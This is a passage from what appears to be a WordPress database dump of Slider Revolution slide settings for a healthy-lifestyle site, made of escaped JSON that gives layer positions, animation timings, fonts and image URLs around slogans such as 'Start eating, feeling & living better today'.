"e\":true},\"t\":{\"v\":\"-139px\"},\"m\":{\"v\":\"-175px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":200},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"speed\":500,\"start\":3000,\"startRelative\":1800,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"1\":{\"text\":\"It\'s time to kick start a new lifestyle\\n\",\"alias\":\"Start Healthy Life i...\",\"uid\":1,\"size\":{\"width\":{\"d\":{\"v\":\"805px\",\"e\":true},\"n\":{\"v\":\"805px\",\"e\":true},\"t\":{\"v\":\"805px\"},\"m\":{\"v\":\"382px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"805px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-1px\",\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-26px\",\"e\":true},\"n\":{\"v\":\"-25px\",\"e\":true},\"t\":{\"v\":\"-25px\"},\"m\":{\"v\":\"-30px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Quicksand \",\"fontSize\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"50px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"900\",\"e\":true},\"n\":{\"v\":\"900\",\"e\":true},\"t\":{\"v\":\"900\"},\"m\":{\"v\":\"900\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"50px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"3\":{\"text\":\"[qodef_button size=\\\"medium\\\" text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"[qodef_button size=\",\"uid\":3,\"size\":{\"width\":{\"d\":{\"v\":\"1200px\",\"e\":true},\"n\":{\"v\":\"1200px\",\"e\":true},\"t\":{\"v\":\"1200px\"},\"m\":{\"v\":\"1200px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"1200px\"},\"position\":{\"x\":{\"d\":{\"v\":\"516px\",\"e\":true},\"n\":{\"v\":\"512px\",\"e\":true},\"t\":{\"v\":\"512px\"},\"m\":{\"v\":\"511px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"98px\",\"e\":true},\"n\":{\"v\":\"105px\",\"e\":true},\"t\":{\"v\":\"105px\"},\"m\":{\"v\":\"118px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":1010},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1000,\"start\":1010,\"startRelative\":1010},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1000,\"start\":1010,\"startRelative\":1010},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(3,2,2,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h1-slide2-background.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"02\"},{\"v\":\"03\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[1000]},\"effects\":{\"parallax\":\"9\"},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"1\":{\"text\":\"Image 2\",\"alias\":\"Image 2\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h1-slider1-graphic1.png\",\"imageId\":1043},\"size\":{\"width\":{\"d\":{\"v\":\"65px\",\"e\":true},\"n\":{\"v\":\"65px\",\"e\":true},\"t\":{\"v\":\"65px\"},\"m\":{\"v\":\"65px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"52px\",\"e\":true},\"n\":{\"v\":\"52px\",\"e\":true},\"t\":{\"v\":\"52px\"},\"m\":{\"v\":\"52px\",\"e\":true}},\"originalWidth\":65,\"originalHeight\":52,\"aspectRatio\":{\"d\":{\"v\":1.25},\"n\":{\"v\":1.25},\"t\":{\"v\":1.25},\"m\":{\"v\":1.25}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"v\":\"4px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"159px\",\"e\":true},\"n\":{\"v\":\"-139px\",\"e\":true},\"t\":{\"v\":\"-139px\"},\"m\":{\"v\":\"-175px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":200},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"speed\":500,\"start\":3000,\"startRelative\":1800,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"2\":{\"text\":\"Start eating, feeling & living better today\",\"alias\":\"Start Healthy Life i...\",\"uid\":2,\"size\":{\"width\":{\"d\":{\"v\":\"805px\",\"e\":true},\"n\":{\"v\":\"805px\",\"e\":true},\"t\":{\"v\":\"805px\"},\"m\":{\"v\":\"382px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"805px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-1px\",\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-27px\",\"e\":true},\"n\":{\"v\":\"-25px\",\"e\":true},\"t\":{\"v\":\"-25px\"},\"m\":{\"v\":\"-30px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim 